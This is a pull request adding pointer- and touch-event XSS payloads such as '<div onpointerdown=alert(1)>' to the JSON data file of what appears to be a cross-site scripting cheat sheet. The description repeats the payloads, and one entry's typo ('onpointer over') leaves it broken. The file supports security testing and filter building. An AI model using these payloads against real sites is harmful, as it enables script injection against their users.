### PR TITLE
add onpointer* , ontouch* pattern

### DIFF
--- a/json/events.json
+++ b/json/events.json
@@ -59834,6 +59834,118 @@
             }
         ]
     },
+    "onpointerover": {
+        "description": "Fires when the mouseover",
+        "tags": [
+            {
+                "tag": "div",
+                "code": "<div onpointer over=alert(1)>",
+				"browsers": [
+                    "chrome",
+                    "firefox",
+                    "edge",
+                    "safari"
+                ],
+                "interaction": true
+            }
+        ]
+    },
+    "onpointerdown": {
+        "description": "Fires when the mouse down",
+        "tags": [
+            {
+                "tag": "div",
+                "code": "<div onpointerdown=alert(1)>",
+				"browsers": [
+                    "chrome",
+                    "firefox",
+                    "edge",
+                    "safari"
+                ],
+                "interaction": true
+            }
+        ]
+    },
+    "onpointerenter": {
+        "description": "Fires when the mouseenter",
+        "tags": [
+            {
+                "tag": "div",
+                "code": "<div onpointerenter=alert(1)>",
+				"browsers": [
+                    "chrome",
+                    "firefox",
+                    "edge",
+                    "safari"
+                ],
+                "interaction": true
+            }
+        ]
+    },
+    "onpointerleave": {
+        "description": "Fires when the mouseleave",
+        "tags": [
+            {
+                "tag": "div",
+                "code": "<div onpointerleave=alert(1)>",
+				"browsers": [
+                    "chrome",
+                    "firefox",
+                    "edge",
+                    "safari"
+                ],
+                "interaction": true
+            }
+        ]
+    },
+    "onpointermove": {
+        "description": "Fires when the mouse move",
+        "tags": [
+            {
+                "tag": "div",
+                "code": "<div onpointermove=alert(1)>",
+				"browsers": [
+                    "chrome",
+                    "firefox",
+                    "edge",
+                    "safari"
+                ],
+                "interaction": true
+            }
+        ]
+    },
+    "onpointerout": {
+        "description": "Fires when the mouse out",
+        "tags": [
+            {
+                "tag": "div",
+                "code": "<div onpointerout=alert(1)>",
+				"browsers": [
+                    "chrome",
+                    "firefox",
+                    "edge",
+                    "safari"
+                ],
+                "interaction": true
+            }
+        ]
+    },
+    "onpointerup": {
+        "description": "Fires when the mouse up",
+        "tags": [
+            {
+                "tag": "div",
+                "code": "<div onpointerup=alert(1)>",
+				"browsers": [
+                    "chrome",
+                    "firefox",
+                    "edge",
+                    "safari"
+                ],
+                "interaction": true
+            }
+        ]
+    },
     "onpopstate": {
         "description": "Fires when the history changes",
         "tags": [

--- a/json/events.json
+++ b/json/events.json
@@ -60279,6 +60279,54 @@
             }
         ]
     },
+    "ontouchstart": {
+        "description": "Fires when the touch screen, only mobile device",
+        "tags": [
+            {
+                "tag": "body",
+                "code": "<body ontouchstart=alert(1)> ",
+                "browsers": [
+                    "chrome",
+                    "firefox",
+                    "edge",
+                    "safari"
+                ],
+                "interaction": true
+            }
+        ]
+    },
+    "ontouchend": {
+        "description": "Fires when the touch screen, only mobile device",
+        "tags": [
+            {
+                "tag": "body",
+                "code": "<body ontouchend=alert(1)> ",
+                "browsers": [
+                    "chrome",
+                    "firefox",
+                    "edge",
+                    "safari"
+                ],
+                "interaction": true
+            }
+        ]
+    },
+    "ontouchmove": {
+        "description": "Fires when the touch screen and move, only mobile device",
+        "tags": [
+            {
+                "tag": "body",
+                "code": "<body ontouchmove=alert(1)> ",
+                "browsers": [
+                    "chrome",
+                    "firefox",
+                    "edge",
+                    "safari"
+                ],
+                "interaction": true
+            }
+        ]
+    },
     "ontransitioncancel": {
         "description": "Fires when a CSS transition cancels",
         "tags": [


### PR DESCRIPTION
Add `onpointer*` pattern.
For example, `div` tag, but the tag is affected the same as `onmouse*`.
(e.g img, body, etc..)
```
<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>
```

refer
https://twitter.com/hahwul/status/1156563423548923905?s=20

Payload all the things added after the this tweet, so please consider applying PR.